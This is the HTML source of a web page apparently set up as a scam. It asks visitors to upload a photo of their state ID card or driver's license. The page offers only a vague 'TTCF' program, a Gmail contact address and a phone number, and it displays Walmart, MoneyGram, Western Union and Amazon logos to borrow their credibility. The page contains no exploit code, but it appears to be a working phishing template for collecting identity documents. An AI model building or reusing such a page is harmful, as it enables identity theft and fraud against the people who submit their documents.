<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>TTCF</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" type="text/css" media="screen" href="CSS/w3.css" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
    <script src="JS/main.js"></script>
    <style>
    body{
        background-image: url("PIC/index.jpg");
    }
    </style>
    
</head>
<body>
        <div class="w3-top">
                <div class="w3-bar w3-white" style="height:60px;">
                    </i><a href="Index.html" class="w3-btn w3-bar-item margin-left"><img  src="PIC/IFC.jpg" style="height:50px; width: 80px;"></a>
                </div>
    </div>
    <div class="w3-display-container">
        <div class="w3-row-padding">
            <div class="w3-col m12">
                <div class="w3-container w3-card w3-padding w3-white" style="margin-top:150px;">
                    <form action="Load.html" data-netlify="true">
                        <h4 class="w3-black w3-padding">KINDLY UPLOAD A VALID PICTURE OF YOUR STATE ID CARD/DRIVER'S LICENSE</h4>
                        <input type="file" name="file" class="w3-input">
                        <br>
                         <button class="w3-btn w3-black" type="submit" >Submit</button>
                    </form>
                </div>
            </div>
        </div>
    </div>
    <br>
    <br>
    <script>
 $("#my-form").submit(function(e) {
  e.preventDefault();

  var $form = $(this);
  $.post($form.attr("action"), $form.serialize()).then(function() {
    alert("Thank you!");
  });
});
    </script>
            <footer class="w3-card-4 w3-container w3-padding w3-mobile">
                <span><i class="fa fa-pencil w3-green w3-margin-right w3-small w3-padding w3-round w3-mobile">TTCF&copy; 2010<script>new Date().getFullYear()>2010&&document.write("-"+new Date().getFullYear());</script>, Company.</i><span></span>
                 <span><i class="fa fa-envelope w3-green w3-margin-right w3-small w3-padding w3-round w3-mobile">ttcfprogram1@gmail.com</i></span>
                 <span class="w3-center"><i class="fa fa-phone w3-green w3-margin-right w3-small w3-mobile w3-padding w3-round" style="margin-top:20px;">+1(586)-519-0357</i></span>
                 <br>
                 <center>
                         <img class="w3-center" src="PIC/walmart.jpg" style="width:60px; height:60px; margin-top:-10;">
                         <img class=" w3-center" src="PIC/mg.png" style="width:60px; height:60px; margin-top:-10;">
                         <img class=" w3-circle w3-center" src="PIC/wu.png" style="width:60px; height:60px; margin-top:-10;">
                         <img class=" w3-circle w3-center" src="PIC/amazon.jpg" style="width:60px; height:60px; margin-top:-10;">
                 </center>
             </footer>
</body>
</html>